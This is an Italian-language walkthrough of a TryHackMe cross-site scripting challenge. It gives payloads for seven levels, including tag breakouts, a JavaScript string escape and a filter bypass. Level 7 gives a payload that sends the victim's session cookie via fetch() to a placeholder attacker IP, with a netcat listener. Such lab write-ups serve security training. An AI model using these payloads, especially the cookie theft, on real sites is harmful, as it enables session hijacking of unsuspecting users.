Tutorials

Challenge TryHackMe

LEVEL 1:  Al posto del nome inserire lo script

#exploitation#web#xss

LEVEL 1:

Al posto del nome inserire lo script

html
<script>alert('THM');</script>

LEVEL 2:

Al posto del nome inserire lo script:

html
"><script>alert('THM');</script>
il payload "> serve perchè il parametro del nome andava inserito in un input, quindi il payload "> serve per chiudere il tag input

LEVEL 3:

Al posto del nome inserire lo script

html
</textarea><script>alert('THM');</script>
il payload

LEVEL 4:

Al posto del nome inserire lo script

bash
';alert('THM');//
questo payload serve perchè il parametro era processato in una stringa di codice javascript, quindi '; serve per terminare la riga di codice, e // serve per non permettere che questa stringa diventi un commento

LEVEL 5:

Al posto del nome inserire lo script alert('THM'); = questo payload serve perchè la parola "script" era rimossa da un filtro, quindi: 

html
Original Payload: <sscriptcript>alert('THM');</sscriptcript>

Text to be removed (by the filter): <sscriptcript>alert('THM');</sscriptcript>

Final Payload (after passing the filter): <script>alert('THM');</script>

LEVEL 6:

Qui al posto del nome, dovevamo inserire il path di un immagine, quindi: "/images/cat.jpg" onload="alert(THM);"

LEVEL 7:

Qui andiamo ad inserire in un form questa richiesta:

html
</textarea><script>fetch('http://MIO_IP:PORTA_NETCAT?cookie=' + btoa(document.cookie) );</script>
Cosi andremo ad inviare il session cookie della vittima al nostro terminale con netcat in ascolto:
shell
nc -nlvp 9001